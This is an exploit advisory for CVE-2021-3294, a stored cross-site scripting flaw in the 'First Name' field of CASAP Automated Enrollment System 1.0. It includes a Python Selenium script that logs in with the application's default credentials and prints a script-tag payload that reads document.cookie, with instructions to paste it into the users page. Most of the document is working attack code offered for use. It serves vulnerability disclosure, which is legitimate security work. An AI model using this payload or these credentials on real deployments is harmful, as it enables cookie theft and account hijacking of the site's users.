CASAP Automated Enrollment System version 1.0 First Name persistent cross site scripting exploit. Original discovery of persistent cross site scripting in this version is attributed to Richard Jones.
advisories | CVE-2021-3294
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Author: nu11secur1ty
# Date: 02.15.2021
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Athor: https://www.sourcecodester.com/users/yna-ecole
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# CVE: CVE-2021-3294
[+] Credits: (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294
[Exploit Program Code]
#!/usr/bin/python3
# author @nu11secur1ty
# For CVE-2021-3294
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
import os
#enter the link to the website you want to automate login.
website_link="http://localhost/Final/index.php"
#enter your login username
username="yna.ecole"
#enter your login password
password="12345"
#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="login"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
exploit="nu11<script>alert(document.cookie)</script>"
print("If everything is ok, please paste this in to the Users in section in
First Namen")
print(exploit)
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
[Vendor]
https://www.sourcecodester.com/users/yna-ecole
[Vulnerability Type]
XSS
[CVE Reference]
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294
[Security Issue]
CASAP Automated Enrollment System 1.0 is affected by cross-site scripting
(XSS) in users.php.
An attacker can steal a cookie to perform user redirection to a malicious
website.
[Video]
https://www.youtube.com/watch?v=_nhIZyJ8rxM
@nu11secur1ty
https://www.nu11secur1ty.com/
